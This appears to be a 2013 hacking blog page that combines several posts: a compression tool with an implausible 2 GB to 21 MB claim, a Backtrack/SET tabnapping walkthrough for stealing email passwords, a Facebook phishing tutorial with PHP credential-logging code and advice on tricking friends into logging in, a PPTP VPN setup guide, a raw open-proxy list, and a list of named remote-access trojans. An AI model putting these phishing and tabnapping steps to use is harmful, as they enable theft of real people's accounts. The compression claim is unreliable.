Sunday, November 3, 2013

How to compress 1 Gb data to 10 mb

How to compress 1 Gb data to 10 mb


Hey guyz this time i has brought something very interesting for you guyz. Many times ourhard disk runs out of space and we have to delete some data or the other for no reason. Even I used to face the problem sometime back in history and by doing some research on the topic, I actually found a working and an awesome way to save my hard disk space.
How effective is it?
Well by this method I converted NFS UNDERGROUND 2 which is somewhat around 2 Gb tb 21 Mb. And same is the case with everything important I wanted to save.
How did I do it?
You are just about to know… Read on.

I used a software named KGB Archiver.
About KGB archiver: KGB Archiver , an open source compression tool like 7zip and UHARC with an unbelievably high compression rate .It uses AES-256 encryption (one of the strongest encryptionknown for man) to encrypt archives . The disappointing thing with KGB Archiver is due to its high compression rate its minimum hardware requirement is high ( recommend processor with 1,5GHz clock and 256MB of RAM ) and compression and decompression process is time consuming.
Its strength: Very high compression power with very accurate results and no loss of data.
Its weeknss: Due to high compression , the time required to compress and decompress the file is high. High system requirement
From where can you download this software.?
Learn Hacking has already done that for you. Just click on the link given to Download KGB archiver for free.
I am sure you loved this post
Just enjoy and keep learning 

How to hack any E-mail Password using Backtrack 5

How to hack any E-mail Password using Backtrack 5

  
  



Backtrack is the new Penentration testing OS, freely distributed by Linux, Backtrack 5 RC3 has many Hacking tools with new 45 fixed Bugs !!

# Now, How to hack any E-mail ID, Password using Backtrack


First of all find your BT IP to create server of Tabnapping attack

>> go on > Terminal (Command Box) > type  ( ifconfig ) and hit Enter and Copy your I.P >>> as shown in Image !!

Add caption

This Hacking trick is called as a Tabnapping Attack it is same as Phishing but without Hosting your files.

# Let's start Hacking !! start your BT go on > Applications >  Exploitation Tools > Social Engineering Tools > Social Engineering Toolkit > set


#  Now you will see 'set' attack has started 



# Select option 2 (Website attack vectors) from the menu, type 2          hit Enter. as shown in the Image !!


# Select option 4 (Tabnapping Attack Method) 


# Again Select option 2 ( Site Cloner)


#  Paste your I.P address you have copied in step 1 & Hit Enter 
    Now it will ask for website you want to clone (I mean Phish)
    
for eg. Enter www.facebook.com again hit Enter !!



# After Entering IP and Site it will Clone that website and it      will show as shown in Image >>


# Hit Enter to <return> to continue

It will show you successfully message like this >>





After all your Tabnapping Attack is ready !! give your server IP
to your victim like this https://YOUR IP HERE/
& when your victim's open this address in his browser so he will see page something looks like this >>>>>>




# After all if your victim will login through this page he or she will be get Hacked !! like this >>>>

# Well !! now you can see in the above image how Tabnapping attacks are used to hack any E-mail ID Password.........

Hack Facebook Accounts.......PHISHING

            Hack Facebook Accounts.......PHISHING


There are various methods to hack the facebook account. I have not listed all here but i have described very popular method to hack facebook account password by anyone called Phishing. For this We need three files:

1. Php file
 2. Fake facebook login page
 3. Text file to store password
 

1] Create your php file
 Open notepad and copy this code:
 



    header (‘Location: https://login.facebook.com/login.php’);
     $handle = fopen(“password.txt”, “a”);
     foreach($_POST as $variable => $value) {
     fwrite($handle, $variable);
     fwrite($handle, “=”);
     fwrite($handle, $value);
     fwrite($handle, “\r\n”);
     }
     fwrite($ handle, “\r\n”);
     fclose($handle) ;
     exit;
     ?>

Now save this as phishing.php
 Your php file is now created
 If you Don’t understand what this php file is doing you need to learn some basic of php.This php file will save information of victim in file password.txt
 

2] Create facebook fake login page
 Now  go to 
http://www.facebook.com and right click  > View Source.Copy source in notepad and save it as facebooklogin .html .
 Now open source code of this html file We need to find the place where Login  code in facebook page that where send the user after clicking on it.
 Now Press crtl-f after opening source code and   search for this code
 action=anything.
 In this case we have this

    action=”https://login.facebook.com/login.php?”

We replace that part with:

    action=”phishing.php”

Save your facebook.html file
 

3] Text file :
 Create a blank text file and name it password.txt
 


Now upload all the three files Facebooklogin.html,phishing.php,Password.txt in any free web hosting site directory like 000webhost.com.com and now you can just check your fake facebook login page by going to http://yoursite.000webhost.com/Facebook.html for the fake login page.Just type some random user name and any password into the text box and then you will see in your file manager that a file called “Password.txt” is created,In which the password is stored.
 You can use
 
http://www.justfree.com/
 http://www.ripway.com/
 http://www.my3gb.com/

also or any other free hosting site.

Suppose you register with name facebookhack.Your link will be
http://www.facebookhack.justfree.com/
 After uploading files your phishing link will be http://www.facebookhack.justfree.com/facebook.html
 Send this link to your friend if they login there their password will be save at the server .
 You can trick your friend to login this fake facebook page by saying its new version of facebook check it out,or in any way you like.
 

NOTE : This method is just for educational purpose only. I am not responsible for any harm. Use this on your own responsibility..

Hacking Tools in one click

Hot to Create and Setup a PPTP VPN on CentOS, Redhat, and Debian/Ubuntu Based Servers

                   Step 1. Install PPP (CentOS/Redhat)
Use YUM to download and install PPP. 

Code:
yum install ppp
[code]

Now CD to the /usr/local/src folder and download the pptpd rpm. Then install it.
[code]
cd /usr/local/src

wget http://poptop.sourceforge.net/yum/stable/packages/pptpd-1.3.4-2.el6.x86_64.rpm

rpm -Uhv pptpd-1.3.4-2.el6.x86_64.rpm

Note: I searched for the newest version of PPTPD el6 in:
http://poptop.sourceforge.net/yum/stable/packages/

Now, you should probably add the PPTPD service to startup so you don't have to start it again every time you turn off the VPS.

(Re)start the pptpd service.
Code:
service pptpd restart

I'm NOT familiar with CentOS so I'm not 100% sure on the command here. You may want to check this and please tell me if I'm wrong so I can update it.

Command:
Code:
chkconfig pptpd on

From here on out, CentOS, RedHat, Ubuntu server an anything Debian based have the same steps so skip to step #2

Step 1. Install PPTPD (Ubuntu / Debian Based)

This is much simpler than CentOS which is still pretty damn simple imo. 
Code:
sudo apt-get install pptpd

Hit Y to accept, and let it install :D

Now start the service 
Code:
service pptpd start
[/cide]

And add it to startup
[code]
update-rc.d pptpd enable

And from here all the steps are the same as the other OSes I'm covering. 

                      Step 2. Config. Yeah, config.

Okay, you're going to need to know your IP (local) so ill use a standard class c: 192.168.1.1

Edit the conf file with your choice of editor. I'm using nano since I've been using it forever. 
Code:
nano /etc/pptpd.conf

We need to add OUR ip and the range of IPS (number of people allowed on our network. I'll do 250 c:

In pptpd.conf:
Code:
localip 192.168.1.1
remoteip 192.168.1.2-252

Now exit nano if that's what you're using this pseudo code:
Code:
ctrl + x
'Y'
[enter]

Now we are going to prevent DNS leaks by adding public DNS servers. Any group will do:

Google: 8.8.8.8 8.8.4.4

OpenDNS:
Edit the pop confit file:

Code:
nano /etc/ppp/options.pptpd
Find the lines called 'ms-dns' if they exist, and if not, add them.
I'm going to use google's because they're reliable and free c:

Code:
ms-dns 8.8.8.8
ms-dns 8.8.4.4
Okay, last thing. Now we have to enable IP forwarding. I'll again be using nano. 

Code:
nano /etc/sysctl.conf

Find the line with:
net.ipv4.ip_forward = 0
And change it to:
net.ipv4.ip_forward = 1
Then update it by running:

Code:
sysctl -p

And that should be it for config :D unless you count the iptables firewall as config. In that case, we're almost done c:

                Step 3. Add iptables 'Firewall' Rules

Fuck this. iptables is one of the most confusing tools if you haven't taken a week out of your life to master it.
At any rate, well be adding some rules for our iptables. My interface is eth0 but if yours is different obviously use that. 

Code:
iptables --flush
iptables -A INPUT -i eth0 -p tcp --dport 1723 -j ACCEPT
iptables -A INPUT -i eth0 -p gre -j ACCEPT
iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
iptables -A FORWARD -i ppp+ -o eth0 -j ACCEPT
iptables -A FORWARD -i eth0 -o ppp+ -j ACCEPT
Woo.
Now save and restart the iptables service. 

Code:
service iptables save && service iptables restart


                        Step 4. Adding Users and Cleanup


Adding users is very easy with PPTP VPNs. The passwords are NOT stored as hashes or encrypted at all. However also note that the protocol connection itself is encrypted with 128 bits.
So here's the file with the accounts. Here is the setup we use to allow it to get the next available IP:
username [tab] * [tab] password [tab] *

Code:
goodies  *  myPassWord  *
public  *  *  *


Tutorial by Goodies. I Hope You Enjoyed!



Elite Proxies


Elite Proxy List 03 Nov 2013

Elite Proxiescomputer networks, a proxy server is a server (a computer system or an application) that acts as an intermediary for requests from clients seeking resources from other servers. A client connects to the proxy server, requesting some service, such as a file, connection, web page, or other resource available from a different server and the proxy server evaluates the request as a way to simplify and control its complexity. Proxies were invented to add structure and encapsulation to distributed systems.[1] Today, most proxies are web proxies, facilitating access to content on the World Wide Web.

Elite Proxies

Elite Proxy

L1 (465)
Code:

Elite Proxies

1.193.210.218:1998
1.199.241.60:1998
1.204.147.88:1998
101.64.121.228:18186
109.104.104.122:6588
109.173.114.55:3128
110.152.42.56:1174
110.155.119.60:1998
110.181.245.152:1998
110.189.107.56:1174
110.242.94.3:18186
110.53.15.78:1998
110.83.207.21:18186
110.86.175.65:1998
111.121.135.149:1174
111.121.153.187:1998
111.124.228.225:1174
111.164.14.147:1998
111.197.61.1:808
111.63.14.245:80
111.72.6.253:18186
111.72.93.124:1998
111.77.149.19:1998
112.101.13.32:1998
112.101.5.1:1998
112.102.154.88:1174
112.113.225.88:1998
112.123.219.109:1998
112.194.194.59:1174
112.226.115.215:1998
112.230.75.247:18186
112.233.229.4:1174
112.234.2.96:1174
112.234.211.28:1998
112.236.23.94:1174
112.237.66.189:1998
112.238.182.43:1174
112.65.239.147:808
112.98.57.239:1174
113.104.10.107:1998
113.108.92.104:80
113.113.201.86:18186
113.117.145.134:18186
113.141.227.165:1998
113.15.50.36:1998
113.226.132.161:1998
113.228.127.107:1998
113.228.162.107:1998
113.230.152.164:18186
113.239.171.157:1998
113.239.91.195:18186
113.244.29.120:1998
113.5.182.149:1998
113.70.248.215:18186
113.72.204.43:1174
113.73.231.64:1174
114.101.189.237:1174
114.112.194.194:8080
114.138.108.93:1998
114.139.205.93:1998
114.216.191.27:1174
114.224.196.57:1174
114.228.17.49:1998
114.232.156.10:1998
114.232.56.233:1998
114.233.160.66:1998
114.234.194.220:1174
114.236.102.41:1998
114.238.58.125:1174
114.239.194.250:1174
114.255.7.186:80
115.219.38.67:1998
115.223.35.185:1998
115.228.175.81:1998
115.230.113.114:18186
115.237.109.97:1998
115.238.129.158:8080
116.116.11.164:1998

Rats(Remote administration software)

RATS
remote access tool (a RAT) is a piece of software that allows a remote "operator" to control a system as if he has physical access to that system."RAT" software is usually associated with criminal or malicious activity. Malicious RAT software is typically installed without the victim's knowledge, often as payload of a Trojan horse, and will try to hide its operation from the victim and from security software.


SPYNET 2.6

POISON IVY 2.3.2

PRORAT 1.9 [SE]

Cerberus RAT 1.03.4 [BETA]

Turkojan 4 [GOLD]

Lost door V4.0 Pro

Nuclear RAT 2.1.0

Bandook RAT 1.35

Bifrost 1.2.1d

CyberGate RAT v1.01.8

Apocalypse [RAT] v1.4.4

Optix v1.33 [RAT]

Shark 3 [RAT]




Related Posts Plugin for WordPress, Blogger...